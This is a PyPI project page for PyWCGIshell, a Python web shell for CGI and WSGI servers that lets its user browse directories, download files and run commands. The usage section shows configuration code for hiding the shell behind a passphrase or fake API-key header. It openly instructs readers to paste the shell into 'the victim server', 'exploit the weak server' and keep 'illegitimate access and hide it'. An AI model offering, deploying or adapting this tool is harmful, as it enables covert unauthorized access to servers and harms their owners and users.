This package implement a WebShell for CGI and WSGI server.

These details have not been verified by PyPI

Project links

Project description

PyWCGIshell logo

PyWCGIshell

Description

This package implement a WebShell for CGI and WSGI server.

With this WebShell you can:

explore directories and download files
execute command lines (with command history)
show basic informations about environment server
show environments variables

Requirements

This package require :

python3
python3 Standard Library

Installation

pip install PyWCGIshell

Usages

Command line

(Command line is useful to try the webshell)

python3 -m PyWCGIshell wsgi # Try it in wsgi mode

Python script

CGI page

from PyWCGIshell import WebShell

def my_default_cgi_page():
	print("Content-type:text/plain; charset=utf-8")
	print("")
	print("Hello World !")

webshell = WebShell()
webshell.standard_page = my_default_cgi_page
webshell.run()

WSGI page

from PyWCGIshell import WebShell

def my_default_wsgi_page(environ, start_response):
    status = '200 OK'
    headers = [('Content-type', 'text/plain; charset=utf-8')]
    start_response(status, headers)
    return [b"Hello World !"]

webshell = WebShell(type_="wsgi")
webshell.standard_page = my_default_wsgi_page
application = webshell.run
# Apache with mod_wsgi use the "application" as default function

WebShell options

from PyWCGIshell import WebShell

webshell = WebShell(type_="cgi", passphrase="SHELL", pass_type="method")
webshell.run()

I don't recommend using method like pass_type to hide your WebShell.

You can use similar configuration to hide your WebShell.

from PyWCGIshell import WebShell

webshell = WebShell(type_="wsgi", passphrase="<inexistant api key>", pass_type="header_value")
application = webshell.run

To use this WebShell:

Configure (server type, passphrase and passphrase location) and copy the WebShell code or install it
Paste it in the default page of the victim server or import it
Send a request with the passphrase and exploit the weak server

Example

Install and configure PyWCGIshell on WebScripts to keep your illegitimate access and hide it (repo is here).

WebShell on WebScripts - Youtube

Licence

Licensed under the GPL, version 3.

Project details

These details have not been verified by PyPI

Project links

Release history Release notifications | RSS feed

This version

1.1.0

Oct 26, 2021

1.0.3

Oct 22, 2021

1.0.2

Oct 20, 2021

1.0.1

Oct 20, 2021

1.0.0

Oct 20, 2021

0.0.2

May 1, 2021

0.0.1

May 1, 2021

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

PyWCGIshell-1.1.0.tar.gz (21.1 kB view details)

Uploaded Oct 26, 2021 Source

File details

Details for the file PyWCGIshell-1.1.0.tar.gz.

File metadata

Download URL: PyWCGIshell-1.1.0.tar.gz
Upload date: Oct 26, 2021
Size: 21.1 kB
Tags: Source
Uploaded using Trusted Publishing? No
Uploaded via: twine/3.2.0 pkginfo/1.6.1 requests/2.25.0 setuptools/52.0.0 requests-toolbelt/0.9.1 tqdm/4.54.1 CPython/3.9.7

File hashes

Hashes for PyWCGIshell-1.1.0.tar.gz
Algorithm	Hash digest
SHA256	`d1937ba16c65caa54782289f493141e9bd221ff82e04babff4bc5cdf594a3db6`
MD5	`81b4d4b5222de803d80bc706bc442d00`
BLAKE2b-256	`3ff390847d4ebd0136104bf175b75baf0004e13c0750dcac52d310291325b8d0`